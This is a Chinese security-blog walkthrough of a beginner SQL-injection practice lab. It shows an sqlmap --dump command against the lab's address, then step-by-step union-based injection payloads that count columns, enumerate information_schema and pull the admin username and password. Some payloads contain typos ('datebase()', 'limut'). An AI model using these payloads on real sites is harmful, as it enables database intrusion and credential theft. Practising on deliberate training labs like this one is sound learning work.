menu Secto白帽博客-专注于技术研究
[CTF]封神榜SQL注入基础靶场 chap.1
158 浏览 | 2020-03-29 | 分类:渗透测试,CTF | 标签:SqlMap,SQL注入,CTF

前言

Red在写这篇文章时,正值慵懒的周日....
然后,闲的蛋疼的Red觉得不能这么下去了...于是!Red做了个决定!他在床上翻了个身.....才不是嘞!Red决定重打封神榜的靶场!(也为了水博客,淦!)
本章是无waf的基础靶场,各位可以参考一下语句的构建,为日后构建语句打个基础!
ฅ(⌯͒• ɪ •⌯͒)ฅ

靶场

靶场是"封神榜"的靶场,墨者靶场基础的布尔盲注登陆不上Ծ ̮ Ծ。

靶场IP:http://117.41.229.122:8003/

开始!

//
No.1 因为没有waf蠢狗,所以可以直接放到sqlmap里跑....方便的很

sqlmap -u'http://117.41.229.122:8003/?id=1' --dump'

注意!因为是没有狗,且事先已经用and和or确定了id1是注入点,不然不会直接放的.....
但是!这么搞总感觉失去了灵魂....而且还是无法复习构造语句....
所以!手工走起!

//
No.2 手工

1.先进入靶场,我们看一看url栏,没有id参数,也就是说,在这个页面没有注入点。

2.再看看,,,发现了个新闻,一般这个都会有注入点,点进去康康,果然有一个id参数!

3.我们发现id=1这个参数后,先试试and 1=1一边是看看有没有狗,一边看看页面是否正常显示。

4.输入" and 1=1"(注意,此刻的参数实际应是%20and%201=1),发现页面正常,再输入"and 1=2",页面无回显,则可判断,此点可能为注入点!
(当然你也可以%20and%201=1%20--%20)

5.既然确定了注入点,那么还等什么?猜一下字段!构造?id=1 and 1=1 order by 1.

6.发现页面回显正常,则再次构造?id=1 and 1=1 order by 2,发现页面无回显,则可以判断字段数为2。

7.那么接下来我们判断一个回显点:构造?id=1 and 1=2 union select 1,2

8.发现页面有个地方显示了个2,则此地为回显点。

9.那么现在,我们就要开始查询数据库,构造 and 1=2 union select 1,datebase()页面返回:maoshe,则maoshe是库名。

10.查询数据库表名:构造?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=datebase() limit 0,1

11.发现有个admin表,则多数情况下,管理员的账号密码都在这个表里面。

12.查询字段:构造?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=datebase() and table_name='admin' limit 0,1

13.不断更新limit 后面的数字,比如limit 1,1/limit 2,1/limut 3,1最后可知admin表里有三个字段:id,passwd,username。

14.构造union select 1,username from admin limit 0,1

15.再次改变limit后面数字,发现无回显,则只有一个用户。

16.构造union select 1,password from admin limit 0,1

17.得到密码(username是用户名,password为密码)

结束

本章结束,但这个sql的靶场注入没结束,以后会有绕waf傻狗的靶场。

如果想加入我们,或者有什么意见,欢迎联系我们

本人QQ:1377495028

By:Redblade.
Time:2020/3/29

知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议

发表评论

email
web

全部评论 (共 1 条评论)

    Redblade.
    2020-03-29 18:55